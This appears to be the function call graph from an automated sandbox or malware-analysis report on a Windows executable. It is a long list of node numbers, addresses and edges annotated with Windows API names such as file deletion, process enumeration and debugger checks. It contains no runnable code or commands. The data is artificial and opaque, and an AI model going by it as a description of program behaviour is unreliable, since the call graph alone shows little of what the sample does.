136b7c 8 API calls 103425->103427 103426 1752e3 103428 137bb5 8 API calls 103426->103428 103429 175321 103427->103429 103428->103430 103431 136b7c 8 API calls 103429->103431 103443 14fe6f 51 API calls 103430->103443 103431->103417 103432->103381 103434 137bc7 103433->103434 103435 17641d 103433->103435 103444 137bd8 103434->103444 103454 1913c8 8 API calls __fread_nolock 103435->103454 103438 137bd3 103438->103417 103439 176427 103440 13bed9 8 API calls 103439->103440 103441 176433 103439->103441 103440->103441 103442->103426 103443->103425 103445 137be7 103444->103445 103451 137c1b __fread_nolock 103444->103451 103446 17644e 103445->103446 103447 137c0e 103445->103447 103445->103451 103448 15014b 8 API calls 103446->103448 103449 137d74 8 API calls 103447->103449 103450 17645d 103448->103450 103449->103451 103452 15017b 8 API calls 103450->103452 103451->103438 103453 176491 __fread_nolock 103452->103453 103454->103439 103455->103392 103456->103395 103457->103391 103459 1a18b6 103458->103459 103460 15014b 8 API calls 103459->103460 103461 1a18bd 103460->103461 103464 19fcb5 103461->103464 103463 1a18f7 103463->103068 103465 13c2c9 8 API calls 103464->103465 103466 19fcc8 CharLowerBuffW 103465->103466 103467 19fcdb 103466->103467 103468 19fce5 ___scrt_fastfail 103467->103468 103469 13655e 8 API calls 103467->103469 103470 19fd19 103467->103470 103468->103463 103469->103467 103471 19fd2b 103470->103471 103497 13655e 103470->103497 103473 15017b 8 API calls 103471->103473 103476 19fd59 103473->103476 103478 19fd7b 103476->103478 103500 19fbed 8 API calls 103476->103500 103477 19fdb8 103477->103468 103479 15014b 8 API calls 103477->103479 103482 19fe0c 103478->103482 103480 19fdd2 103479->103480 103481 15017b 8 API calls 103480->103481 103481->103468 103483 13bf73 8 API calls 103482->103483 103484 19fe3e 103483->103484 103485 13bf73 8 API calls 103484->103485 103486 19fe47 103485->103486 103487 13bf73 8 API calls 103486->103487 103494 19fe50 103487->103494 103488 1a0114 103488->103477 103489 138577 8 API calls 103489->103494 103490 1566f8 GetStringTypeW 103490->103494 103492 156641 39 API calls 103492->103494 103493 19fe0c 40 API calls 103493->103494 103494->103488 103494->103489 103494->103490 103494->103492 103494->103493 103495 13ad40 8 API calls 103494->103495 103496 13bed9 8 API calls 103494->103496 103501 156722 GetStringTypeW _strftime 103494->103501 103495->103494 103496->103494 103498 13c2c9 8 API calls 103497->103498 103499 136569 103498->103499 103499->103471 103500->103476 103501->103494 103534 1a02aa 103502->103534 103505 1a040b 103508 1a0471 103505->103508 103511 1a041b 103505->103511 103506 1a03f3 103550 1a05e9 56 API calls __fread_nolock 103506->103550 103509 1a04a1 103508->103509 103510 1a0507 103508->103510 103527 1a0399 __fread_nolock 103508->103527 103512 1a04d1 103509->103512 103513 1a04a6 103509->103513 103514 1a05b0 103510->103514 103515 1a0510 103510->103515 103533 1a0453 103511->103533 103551 1a2855 10 API calls 103511->103551 103512->103527 103555 13ca5b 39 API calls 103512->103555 103513->103527 103554 13ca5b 39 API calls 103513->103554 103514->103527 103559 13c63f 39 API calls 103514->103559 103516 1a058d 103515->103516 103517 1a0515 103515->103517 103516->103527 103558 13c63f 39 API calls 103516->103558 103522 1a051b 103517->103522 103523 1a0554 103517->103523 103522->103527 103556 13c63f 39 API calls 103522->103556 103523->103527 103557 13c63f 39 API calls 103523->103557 103527->103076 103528 1a0427 103552 1a2855 10 API calls 103528->103552 103531 1a043e __fread_nolock 103553 1a2855 10 API calls 103531->103553 103541 1a1844 103533->103541 103535 1a02f7 103534->103535 103539 1a02bb 103534->103539 103536 13c98d 39 API calls 103535->103536 103540 1a02f5 103536->103540 103537 138ec0 52 API calls 103537->103539 103538 154d98 _strftime 40 API calls 103538->103539 103539->103537 103539->103538 103539->103540 103540->103505 103540->103506 103540->103527 103542 1a184f 103541->103542 103543 15014b 8 API calls 103542->103543 103544 1a1856 103543->103544 103545 1a1862 103544->103545 103546 1a1883 103544->103546 103548 15017b 8 API calls 103545->103548 103547 15017b 8 API calls 103546->103547 103549 1a186b ___scrt_fastfail 103547->103549 103548->103549 103549->103527 103550->103527 103551->103528 103552->103531 103553->103533 103554->103527 103555->103527 103556->103527 103557->103527 103558->103527 103559->103527 103560->103085 103562 13bf73 8 API calls 103561->103562 103563 19dc73 103562->103563 103564 13bf73 8 API calls 103563->103564 103565 19dc7c 103564->103565 103566 13bf73 8 API calls 103565->103566 103567 19dc85 103566->103567 103568 135851 9 API calls 103567->103568 103569 19dc90 103568->103569 103585 19eab0 GetFileAttributesW 103569->103585 103572 19dcab 103587 13568e 103572->103587 103573 136b7c 8 API calls 103573->103572 103575 19dcbf FindFirstFileW 103576 19dd4b FindClose 103575->103576 103579 19dcde 103575->103579 103582 19dd56 103576->103582 103577 19dd26 FindNextFileW 103577->103579 103578 13bed9 8 API calls 103578->103579 103579->103576 103579->103577 103579->103578 103580 137bb5 8 API calls 103579->103580 103581 136b7c 8 API calls 103579->103581 103580->103579 103583 19dd17 DeleteFileW 103581->103583 103582->103090 103583->103577 103584 19dd42 FindClose 103583->103584 103584->103582 103586 19dc99 103585->103586 103586->103572 103586->103573 103588 13bf73 8 API calls 103587->103588 103589 1356a4 103588->103589 103590 13bf73 8 API calls 103589->103590 103591 1356ac 103590->103591 103592 13bf73 8 API calls 103591->103592 103593 1356b4 103592->103593 103594 13bf73 8 API calls 103593->103594 103595 1356bc 103594->103595 103596 1356f0 103595->103596 103597 174da1 103595->103597 103599 13acc0 8 API calls 103596->103599 103598 13bed9 8 API calls 103597->103598 103600 174daa 103598->103600 103601 1356fe 103599->103601 103602 13bd57 8 API calls 103600->103602 103603 13adf4 8 API calls 103601->103603 103605 135733 103602->103605 103604 135708 103603->103604 103604->103605 103606 13acc0 8 API calls 103604->103606 103607 135778 103605->103607 103608 135754 103605->103608 103613 174dcc 103605->103613 103610 135729 103606->103610 103609 13acc0 8 API calls 103607->103609 103608->103607 103615 13655e 8 API calls 103608->103615 103611 135789 103609->103611 103612 13adf4 8 API calls 103610->103612 103614 13579f 103611->103614 103619 13bed9 8 API calls 103611->103619 103612->103605 103618 138577 8 API calls 103613->103618 103616 1357b3 103614->103616 103621 13bed9 8 API calls 103614->103621 103617 135761 103615->103617 103622 13bed9 8 API calls 103616->103622 103623 1357be 103616->103623 103617->103607 103620 13acc0 8 API calls 103617->103620 103626 174e8c 103618->103626 103619->103614 103620->103607 103621->103616 103622->103623 103624 13bed9 8 API calls 103623->103624 103627 1357c9 103623->103627 103624->103627 103625 13655e 8 API calls 103625->103626 103626->103607 103626->103625 103629 13ad40 8 API calls __fread_nolock 103626->103629 103627->103575 103629->103626 103640 19e80e 103630->103640 103632 19ddd4 Process32NextW 103633 19de86 CloseHandle 103632->103633 103638 19ddcd 103632->103638 103633->103100 103634 13bf73 8 API calls 103634->103638 103635 13b329 8 API calls 103635->103638 103636 13568e 8 API calls 103636->103638 103637 137bb5 8 API calls 103637->103638 103638->103632 103638->103633 103638->103634 103638->103635 103638->103636 103638->103637 103646 14e36b 41 API calls 103638->103646 103644 19e819 103640->103644 103641 19e830 103648 15666b 39 API calls _strftime 103641->103648 103644->103641 103645 19e836 103644->103645 103647 156722 GetStringTypeW _strftime 103644->103647 103645->103638 103646->103638 103647->103644 103648->103645 103650 15017b 8 API calls 103649->103650 103651 14c209 103650->103651 103652 15014b 8 API calls 103651->103652 103653 14c215 103652->103653 103653->103118 103655 14fa35 103654->103655 103656 14f9fe 103654->103656 103663 14fe8a 8 API calls 103655->103663 103657 15017b 8 API calls 103656->103657 103659 14fa05 WideCharToMultiByte 103657->103659 103662 14fa3e 8 API calls __fread_nolock 103659->103662 103661 14fa29 103661->103122 103662->103661 103663->103661 103664->103154 103665->103157 103666->103162 103667->103171 103668->103181 103669->103171 103670->103195 103671->103171 103672->102858 103673->102852 103674->102854 103675->102854 103693 13cf80 103676->103693 103678 13bfb5 103679 13bfc3 103678->103679 103680 180db6 103678->103680 103681 15014b 8 API calls 103679->103681 103702 13b4c8 8 API calls 103680->103702 103684 13bfd4 103681->103684 103683 180dc1 103685 13bf73 8 API calls 103684->103685 103686 13bfde 103685->103686 103687 13bfed 103686->103687 103689 13bed9 8 API calls 103686->103689 103688 15014b 8 API calls 103687->103688 103690 13bff7 103688->103690 103689->103687 103701 13be7b 39 API calls 103690->103701 103692 13c01b 103692->102766 103694 13d1c7 103693->103694 103699 13cf93 103693->103699 103694->103678 103696 13bf73 8 API calls 103696->103699 103697 13d03d 103697->103678 103699->103696 103699->103697 103703 1505b2 5 API calls __Init_thread_wait 103699->103703 103704 150413 29 API calls __onexit 103699->103704 103705 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103699->103705 103701->103692 103702->103683 103703->103699 103704->103699 103705->103699 103706 1418c6 103707 15014b 8 API calls 103706->103707 103708 1418cd 103707->103708 103709 13f4c0 103712 14a025 103709->103712 103711 13f4cc 103713 14a046 103712->103713 103714 14a0a3 103712->103714 103713->103714 103716 140340 224 API calls 103713->103716 103718 14a0e7 103714->103718 103721 1a3fe1 81 API calls __wsopen_s 103714->103721 103719 14a077 103716->103719 103717 18806b 103717->103717 103718->103711 103719->103714 103719->103718 103720 13bed9 8 API calls 103719->103720 103720->103714 103721->103717 103722 168782 103727 16853e 103722->103727 103725 1687aa 103728 16856f try_get_first_available_module 103727->103728 103735 1686b8 103728->103735 103742 15917b 40 API calls 2 library calls 103728->103742 103730 16876e 103746 162b5c 26 API calls __fread_nolock 103730->103746 103732 1686c3 103732->103725 103739 170d04 103732->103739 103734 16870c 103734->103735 103743 15917b 40 API calls 2 library calls 103734->103743 103735->103732 103745 15f649 20 API calls __dosmaperr 103735->103745 103737 16872b 103737->103735 103744 15917b 40 API calls 2 library calls 103737->103744 103747 170401 103739->103747 103741 170d1f 103741->103725 103742->103734 103743->103737 103744->103735 103745->103730 103746->103732 103749 17040d CallCatchBlock 103747->103749 103748 17041b 103805 15f649 20 API calls __dosmaperr 103748->103805 103749->103748 103751 170454 103749->103751 103758 1709db 103751->103758 103752 170420 103806 162b5c 26 API calls __fread_nolock 103752->103806 103757 17042a __fread_nolock 103757->103741 103808 1707af 103758->103808 103761 170a26 103826 165594 103761->103826 103762 170a0d 103840 15f636 20 API calls __dosmaperr 103762->103840 103765 170a2b 103766 170a34 103765->103766 103767 170a4b 103765->103767 103842 15f636 20 API calls __dosmaperr 103766->103842 103839 17071a CreateFileW 103767->103839 103771 170a39 103843 15f649 20 API calls __dosmaperr 103771->103843 103772 170a84 103774 170b01 GetFileType 103772->103774 103775 170ad6 GetLastError 103772->103775 103844 17071a CreateFileW 103772->103844 103776 170b0c GetLastError 103774->103776 103778 170b53 103774->103778 103845 15f613 20 API calls __dosmaperr 103775->103845 103846 15f613 20 API calls __dosmaperr 103776->103846 103848 1654dd 21 API calls 2 library calls 103778->103848 103780 170b1a CloseHandle 103782 170a12 103780->103782 103783 170b43 103780->103783 103841 15f649 20 API calls __dosmaperr 103782->103841 103847 15f649 20 API calls __dosmaperr 103783->103847 103785 170ac9 103785->103774 103785->103775 103787 170b74 103789 170bc0 103787->103789 103849 17092b 72 API calls 3 library calls 103787->103849 103788 170b48 103788->103782 103794 170bed 103789->103794 103850 1704cd 72 API calls 4 library calls 103789->103850 103792 170be6 103793 170bfe 103792->103793 103792->103794 103796 170478 103793->103796 103797 170c7c CloseHandle 103793->103797 103851 168a2e 103794->103851 103807 1704a1 LeaveCriticalSection __wsopen_s 103796->103807 103866 17071a CreateFileW 103797->103866 103799 170ca7 103800 170cdd 103799->103800 103801 170cb1 GetLastError 103799->103801 103800->103796 103867 15f613 20 API calls __dosmaperr 103801->103867 103803 170cbd 103868 1656a6 21 API calls 2 library calls 103803->103868 103805->103752 103806->103757 103807->103757 103809 1707ea 103808->103809 103810 1707d0 103808->103810 103869 17073f 103809->103869 103810->103809 103876 15f649 20 API calls __dosmaperr 103810->103876 103813 1707df 103877 162b5c 26 API calls __fread_nolock 103813->103877 103815 170822 103816 170851 103815->103816 103878 15f649 20 API calls __dosmaperr 103815->103878 103821 1708a4 103816->103821 103880 15da7d 26 API calls 2 library calls 103816->103880 103819 17089f 103819->103821 103822 17091e 103819->103822 103820 170846 103879 162b5c 26 API calls __fread_nolock 103820->103879 103821->103761 103821->103762 103881 162b6c 11 API calls _abort 103822->103881 103825 17092a 103827 1655a0 CallCatchBlock 103826->103827 103884 1632d1 EnterCriticalSection 103827->103884 103829 1655ee 103885 16569d 103829->103885 103830 1655a7 103830->103829 103831 1655cc 103830->103831 103836 16563a EnterCriticalSection 103830->103836 103888 165373 103831->103888 103834 165617 __fread_nolock 103834->103765 103836->103829 103837 165647 LeaveCriticalSection 103836->103837 103837->103830 103839->103772 103840->103782 103841->103796 103842->103771 103843->103782 103844->103785 103845->103782 103846->103780 103847->103788 103848->103787 103849->103789 103850->103792 103914 165737 103851->103914 103853 168a44 103927 1656a6 21 API calls 2 library calls 103853->103927 103855 168a3e 103855->103853 103856 168a76 103855->103856 103858 165737 __wsopen_s 26 API calls 103855->103858 103856->103853 103859 165737 __wsopen_s 26 API calls 103856->103859 103857 168a9c 103861 168abe 103857->103861 103928 15f613 20 API calls __dosmaperr 103857->103928 103862 168a6d 103858->103862 103860 168a82 CloseHandle 103859->103860 103860->103853 103863 168a8e GetLastError 103860->103863 103861->103796 103865 165737 __wsopen_s 26 API calls 103862->103865 103863->103853 103865->103856 103866->103799 103867->103803 103868->103800 103871 170757 103869->103871 103870 170772 103870->103815 103871->103870 103882 15f649 20 API calls __dosmaperr 103871->103882 103873 170796 103883 162b5c 26 API calls __fread_nolock 103873->103883 103875 1707a1 103875->103815 103876->103813 103877->103809 103878->103820 103879->103816 103880->103819 103881->103825 103882->103873 103883->103875 103884->103830 103896 163319 LeaveCriticalSection 103885->103896 103887 1656a4 103887->103834 103897 164ff0 103888->103897 103890 165392 103905 162d38 103890->103905 103892 165385 103892->103890 103904 163778 11 API calls 2 library calls 103892->103904 103894 1653e4 103894->103829 103895 1654ba EnterCriticalSection 103894->103895 103895->103829 103896->103887 103900 164ffd __dosmaperr 103897->103900 103898 16503d 103912 15f649 20 API calls __dosmaperr 103898->103912 103899 165028 RtlAllocateHeap 103899->103900 103901 16503b 103899->103901 103900->103898 103900->103899 103911 15521d 7 API calls 2 library calls 103900->103911 103901->103892 103904->103892 103906 162d43 RtlFreeHeap 103905->103906 103907 162d6c __dosmaperr 103905->103907 103906->103907 103908 162d58 103906->103908 103907->103894 103913 15f649 20 API calls __dosmaperr 103908->103913 103910 162d5e GetLastError 103910->103907 103911->103900 103912->103901 103913->103910 103915 165744 103914->103915 103918 165759 103914->103918 103929 15f636 20 API calls __dosmaperr 103915->103929 103917 165749 103930 15f649 20 API calls __dosmaperr 103917->103930 103921 16577e 103918->103921 103931 15f636 20 API calls __dosmaperr 103918->103931 103921->103855 103922 165789 103932 15f649 20 API calls __dosmaperr 103922->103932 103923 165751 103923->103855 103925 165791 103933 162b5c 26 API calls __fread_nolock 103925->103933 103927->103857 103928->103861 103929->103917 103930->103923 103931->103922 103932->103925 103933->103923 104545 13f5e5 104546 13cab0 224 API calls 104545->104546 104547 13f5f3 104546->104547 103934 18400f 103950 13eeb0 messages 103934->103950 103935 13f211 PeekMessageW 103935->103950 103936 13ef07 GetInputState 103936->103935 103936->103950 103938 1832cd TranslateAcceleratorW 103938->103950 103939 13f28f PeekMessageW 103939->103950 103940 13f104 timeGetTime 103940->103950 103941 13f273 TranslateMessage DispatchMessageW 103941->103939 103942 13f2af Sleep 103942->103950 103943 184183 Sleep 103957 184060 103943->103957 103945 1833e9 timeGetTime 104002 14aa65 9 API calls 103945->104002 103947 19dd87 46 API calls 103947->103957 103949 18421a GetExitCodeProcess 103952 184230 WaitForSingleObject 103949->103952 103953 184246 CloseHandle 103949->103953 103950->103935 103950->103936 103950->103938 103950->103939 103950->103940 103950->103941 103950->103942 103950->103943 103950->103945 103955 13f0d5 103950->103955 103950->103957 103962 140340 224 API calls 103950->103962 103964 142b20 224 API calls 103950->103964 103966 13f450 103950->103966 103973 13f6d0 103950->103973 103996 14e915 103950->103996 104001 14f215 timeGetTime 103950->104001 104003 1a446f 8 API calls 103950->104003 104004 1a3fe1 81 API calls __wsopen_s 103950->104004 103951 1c345b GetForegroundWindow 103951->103957 103952->103950 103952->103953 103953->103957 103956 183d51 103956->103955 103957->103947 103957->103949 103957->103950 103957->103951 103957->103956 103958 1842b8 Sleep 103957->103958 104005 1b60b5 8 API calls 103957->104005 104006 19f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103957->104006 104007 14f215 timeGetTime 103957->104007 103958->103950 103962->103950 103964->103950 103967 13f46f 103966->103967 103969 13f483 103966->103969 104008 13e960 103967->104008 104040 1a3fe1 81 API calls __wsopen_s 103969->104040 103970 13f47a 103970->103950 103972 184584 103972->103972 103974 13f6ef 103973->103974 103992 13f7dc messages 103974->103992 104057 1505b2 5 API calls __Init_thread_wait 103974->104057 103975 140340 224 API calls 103975->103992 103978 1845d9 103980 13bf73 8 API calls 103978->103980 103978->103992 103979 13bf73 8 API calls 103979->103992 103981 1845f3 103980->103981 104058 150413 29 API calls __onexit 103981->104058 103982 13be2d 39 API calls 103982->103992 103986 1845fd 104059 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103986->104059 103989 13bed9 8 API calls 103989->103992 103990 141ca0 8 API calls 103990->103992 103991 1a3fe1 81 API calls 103991->103992 103992->103975 103992->103979 103992->103982 103992->103989 103992->103990 103992->103991 103993 13fae1 103992->103993 104056 14b35c 224 API calls 103992->104056 104060 1505b2 5 API calls __Init_thread_wait 103992->104060 104061 150413 29 API calls __onexit 103992->104061 104062 150568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103992->104062 104063 1b5231 101 API calls 103992->104063 104064 1b731e 224 API calls 103992->104064 103993->103950 103997 14e959 103996->103997 103998 14e928 103996->103998 103997->103950 103998->103997 103999 14e94c IsDialogMessageW 103998->103999 104000 18eff6 GetClassLongW 103998->104000 103999->103997 103999->103998 104000->103998 104000->103999 104001->103950 104002->103950 104003->103950 104004->103950 104005->103957 104006->103957 104007->103957 104009 140340 224 API calls 104008->104009 104026 13e99d 104009->104026 104010 1831d3 104054 1a3fe1 81 API calls __wsopen_s 104010->104054 104012 13ea0b messages 104012->103970 104013 13edd5 104013->104012 104024 15017b 8 API calls 104013->104024 104014 13eac3 104014->104013 104016 13eace 104014->104016 104015 13ecff 104017 13ed14 104015->104017 104018 1831c4 104015->104018 104020 15014b 8 API calls 104016->104020 104021 15014b 8 API calls 104017->104021 104053 1b6162 8 API calls 104018->104053 104019 13ebb8 104025 15017b 8 API calls 104019->104025 104029 13ead5 __fread_nolock 104020->104029 104034 13eb6a 104021->104034 104023 15014b 8 API calls 104023->104026 104024->104029 104030 13eb29 __fread_nolock messages 104025->104030 104026->104010 104026->104012 104026->104013 104026->104014 104026->104019 104026->104023 104026->104030 104027 15014b 8 API calls 104028 13eaf6 104027->104028 104028->104030 104041 13d260 104028->104041 104029->104027 104029->104028 104030->104015 104032 1831b3 104030->104032 104030->104034 104036 18318e 104030->104036 104038 18316c 104030->104038 104049 1344fe 224 API calls 104030->104049 104052 1a3fe1 81 API calls __wsopen_s 104032->104052 104034->103970 104051 1a3fe1 81 API calls __wsopen_s 104036->104051 104050 1a3fe1 81 API calls __wsopen_s 104038->104050 104040->103972 104042 13d2c6 104041->104042 104043 13d29a 104041->104043 104045 140340 224 API calls 104042->104045 104044 13f6d0 224 API calls 104043->104044 104048 13d2a0 104044->104048 104046 18184b 104045->104046 104046->104048 104055 1a3fe1 81 API calls __wsopen_s 104046->104055 104048->104030 104049->104030 104050->104034 104051->104034 104052->104034 104053->104010 104054->104012 104055->104048 104056->103992 104057->103978 104058->103986 104059->103992 104060->103992 104061->103992 104062->103992 104063->103992 104064->103992 104065 131044 104070 132793 104065->104070 104067 13104a 104106 150413 29 API calls __onexit 104067->104106 104069 131054 104107 132a38 104070->104107 104074 13280a 104075 13bf73 8 API calls 104074->104075 104076 132814 104075->104076 104077 13bf73 8 API calls 104076->104077 104078 13281e 104077->104078 104079 13bf73 8 API calls 104078->104079 104080 132828 104079->104080 104081 13bf73 8 API calls 104080->104081 104082 132866 104081->104082 104083 13bf73 8 API calls 104082->104083 104084 132932 104083->104084 104117 132dbc 104084->104117 104088 132964 104089 13bf73 8 API calls 104088->104089 104090 13296e 104089->104090 104091 143160 9 API calls 104090->104091 104092 132999 104091->104092 104144 133166 104092->104144 104094 1329b5 104095 1329c5 GetStdHandle 104094->104095 104096 1739e7 104095->104096 104098 132a1a 104095->104098 104097 1739f0 104096->104097 104096->104098 104099 15014b 8 API calls 104097->104099 104100 132a27 OleInitialize 104098->104100 104101 1739f7 104099->104101 104100->104067 104151 1a0ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 104101->104151 104103 173a00 104152 1a12eb CreateThread 104103->104152 104105 173a0c CloseHandle 104105->104098 104106->104069 104153 132a91 104107->104153 104110 132a91 8 API calls 104111 132a70 104110->104111 104112 13bf73 8 API calls 104111->104112 104113 132a7c 104112->104113 104114 138577 8 API calls 104113->104114 104115 1327c9 104114->104115 104116 13327e 6 API calls 104115->104116 104116->104074 104118 13bf73 8 API calls 104117->104118 104119 132dcc 104118->104119 104120 13bf73 8 API calls 104119->104120 104121 132dd4 104120->104121 104160 1381d6 104121->104160 104124 1381d6 8 API calls 104125 132de4 104124->104125 104126 13bf73 8 API calls 104125->104126 104127 132def 104126->104127 104128 15014b 8 API calls 104127->104128 104129 13293c 104128->104129 104130 133205 104129->104130 104131 133213 104130->104131 104132 13bf73 8 API calls 104131->104132 104133 13321e 104132->104133 104134 13bf73 8 API calls 104133->104134 104135 133229 104134->104135 104136 13bf73 8 API calls 104135->104136 104137 133234 104136->104137 104138 13bf73 8 API calls 104137->104138 104139 13323f 104138->104139 104140 1381d6 8 API calls 104139->104140 104141 13324a 104140->104141 104142 15014b 8 API calls 104141->104142 104143 133251 RegisterWindowMessageW 104142->104143 104143->104088 104145 133176 104144->104145 104146 173c8f 104144->104146 104147 15014b 8 API calls 104145->104147 104163 1a3c4e 8 API calls 104146->104163 104149 13317e 104147->104149 104149->104094 104150 173c9a 104151->104103 104152->104105 104164 1a12d1 14 API calls 104152->104164 104154 13bf73 8 API calls 104153->104154 104155 132a9c 104154->104155 104156 13bf73 8 API calls 104155->104156 104157 132aa4 104156->104157 104158 13bf73 8 API calls 104157->104158 104159 132a66 104158->104159 104159->104110 104161 13bf73 8 API calls 104160->104161 104162 132ddc 104161->104162 104162->104124 104163->104150 104548 15f06e 104549 15f07a CallCatchBlock 104548->104549 104550 15f086 104549->104550 104551 15f09b 104549->104551 104567 15f649 20 API calls __dosmaperr 104550->104567 104561 1594fd EnterCriticalSection 104551->104561 104554 15f08b 104568 162b5c 26 API calls __fread_nolock 104554->104568 104555 15f0a7 104562 15f0db 104555->104562 104560 15f096 __fread_nolock 104561->104555 104570 15f106 104562->104570 104564 15f0e8 104565 15f0b4 104564->104565 104590 15f649 20 API calls __dosmaperr 104564->104590 104569 15f0d1 LeaveCriticalSection __fread_nolock 104565->104569 104567->104554 104568->104560 104569->104560 104571 15f114 104570->104571 104572 15f12e 104570->104572 104594 15f649 20 API calls __dosmaperr 104571->104594 104574 15dcc5 __fread_nolock 26 API calls 104572->104574 104577 15f137 104574->104577 104575 15f119 104595 162b5c 26 API calls __fread_nolock 104575->104595 104591 169789 104577->104591 104580 15f1bf 104584 15f1dc 104580->104584 104586 15f1ee 104580->104586 104581 15f23b 104582 15f248 104581->104582 104581->104586 104597 15f649 20 API calls __dosmaperr 104582->104597 104596 15f41f 31 API calls 4 library calls 104584->104596 104587 15f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 104586->104587 104598 15f29b 30 API calls 2 library calls 104586->104598 104587->104564 104588 15f1e6 104588->104587 104590->104565 104599 169606 104591->104599 104593 15f153 104593->104580 104593->104581 104593->104587 104594->104575 104595->104587 104596->104588 104597->104587 104598->104587 104600 169612 CallCatchBlock 104599->104600 104601 16961a 104600->104601 104603 169632 104600->104603 104625 15f636 20 API calls __dosmaperr 104601->104625 104602 1696e6 104630 15f636 20 API calls __dosmaperr 104602->104630 104603->104602 104608 16966a 104603->104608 104606 16961f 104626 15f649 20 API calls __dosmaperr 104606->104626 104607 1696eb 104631 15f649 20 API calls __dosmaperr 104607->104631 104624 1654ba EnterCriticalSection 104608->104624 104612 1696f3 104632 162b5c 26 API calls __fread_nolock 104612->104632 104613 169670 104615 169694 104613->104615 104616 1696a9 104613->104616 104627 15f649 20 API calls __dosmaperr 104615->104627 104618 16970b __wsopen_s 28 API calls 104616->104618 104621 1696a4 104618->104621 104619 169699 104628 15f636 20 API calls __dosmaperr 104619->104628 104620 169627 __fread_nolock 104620->104593 104629 1696de LeaveCriticalSection __wsopen_s 104621->104629 104624->104613 104625->104606 104626->104620 104627->104619 104628->104621 104629->104620 104630->104607 104631->104612 104632->104620 104633 15076b 104634 150777 CallCatchBlock 104633->104634 104663 150221 104634->104663 104636 15077e 104637 1508d1 104636->104637 104640 1507a8 104636->104640 104701 150baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 104637->104701 104639 1508d8 104702 1551c2 28 API calls _abort 104639->104702 104642 1507e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 104640->104642 104674 1627ed 104640->104674 104650 150848 104642->104650 104697 15518a 38 API calls 3 library calls 104642->104697 104643 1508de 104703 155174 28 API calls _abort 104643->104703 104647 1508e6 104648 1507c7 104682 150cc9 104650->104682 104652 15084e 104686 13331b 104652->104686 104657 15086a 104657->104639 104658 15086e 104657->104658 104659 150877 104658->104659 104699 155165 28 API calls _abort 104658->104699 104700 1503b0 13 API calls 2 library calls 104659->104700 104662 15087f 104662->104648 104664 15022a 104663->104664 104704 150a08 IsProcessorFeaturePresent 104664->104704 104666 150236 104705 153004 10 API calls 3 library calls 104666->104705 104668 15023b 104669 15023f 104668->104669 104706 162687 104668->104706 104669->104636 104672 150256 104672->104636 104675 162804 104674->104675 104676 150dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 104675->104676 104677 1507c1 104676->104677 104677->104648 104678 162791 104677->104678 104679 1627c0 104678->104679 104680 150dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 104679->104680 104681 1627e9 104680->104681 104681->104642 104757 1526b0 104682->104757 104685 150cef 104685->104652 104687 133327 IsThemeActive 104686->104687 104688 133382 104686->104688 104759 1552b3 104687->104759 104698 150d02 GetModuleHandleW 104688->104698 104690 133352 104765 155319 104690->104765 104692 133359 104772 1332e6 SystemParametersInfoW SystemParametersInfoW 104692->104772 104694 133360 104773 13338b 104694->104773 104696 133368 SystemParametersInfoW 104696->104688 104697->104650 104698->104657 104699->104659 104700->104662 104701->104639 104702->104643 104703->104647 104704->104666 104705->104668 104710 16d576 104706->104710 104709 15302d 8 API calls 3 library calls 104709->104669 104711 16d593 104710->104711 104714 16d58f 104710->104714 104711->104714 104716 164f6e 104711->104716 104713 150248 104713->104672 104713->104709 104728 150dfc 104714->104728 104717 164f7a CallCatchBlock 104716->104717 104735 1632d1 EnterCriticalSection 104717->104735 104719 164f81 104736 165422 104719->104736 104721 164f90 104727 164f9f 104721->104727 104749 164e02 29 API calls 104721->104749 104724 164f9a 104750 164eb8 GetStdHandle GetFileType 104724->104750 104725 164fb0 __fread_nolock 104725->104711 104751 164fbb LeaveCriticalSection _abort 104727->104751 104729 150e05 104728->104729 104730 150e07 IsProcessorFeaturePresent 104728->104730 104729->104713 104732 150fce 104730->104732 104756 150f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104732->104756 104734 1510b1 104734->104713 104735->104719 104737 16542e CallCatchBlock 104736->104737 104738 165452 104737->104738 104739 16543b 104737->104739 104752 1632d1 EnterCriticalSection 104738->104752 104753 15f649 20 API calls __dosmaperr 104739->104753 104742 16545e 104746 165373 __wsopen_s 21 API calls 104742->104746 104748 16548a 104742->104748 104743 165440 104754 162b5c 26 API calls __fread_nolock 104743->104754 104746->104742 104747 16544a __fread_nolock 104747->104721 104755 1654b1 LeaveCriticalSection _abort 104748->104755 104749->104724 104750->104727 104751->104725 104752->104742 104753->104743 104754->104747 104755->104747 104756->104734 104758 150cdc GetStartupInfoW 104757->104758 104758->104685 104760 1552bf CallCatchBlock 104759->104760 104822 1632d1 EnterCriticalSection 104760->104822 104762 1552ca pre_c_initialization 104823 15530a 104762->104823 104764 1552ff __fread_nolock 104764->104690 104766 155325 104765->104766 104767 15533f 104765->104767 104766->104767 104827 15f649 20 API calls __dosmaperr 104766->104827 104767->104692 104769 15532f 104828 162b5c 26 API calls __fread_nolock 104769->104828 104771 15533a 104771->104692 104772->104694 104774 13339b __wsopen_s 104773->104774 104775 13bf73 8 API calls 104774->104775 104776 1333a7 GetCurrentDirectoryW 104775->104776 104829 134fd9 104776->104829 104778 1333ce IsDebuggerPresent 104779 173ca3 MessageBoxA 104778->104779 104780 1333dc 104778->104780 104782 173cbb 104779->104782 104781 1333f0 104780->104781 104780->104782 104897 133a95 104781->104897 104933 134176 8 API calls 104782->104933 104789 133462 104791 173cec SetCurrentDirectoryW 104789->104791 104792 13346a 104789->104792 104791->104792 104793 133475 104792->104793 104934 191fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 104792->104934 104929 1334d3 7 API calls 104793->104929 104796 173d07 104796->104793 104799 173d19 104796->104799 104801 135594 10 API calls 104799->104801 104800 13347f 104803 13396b 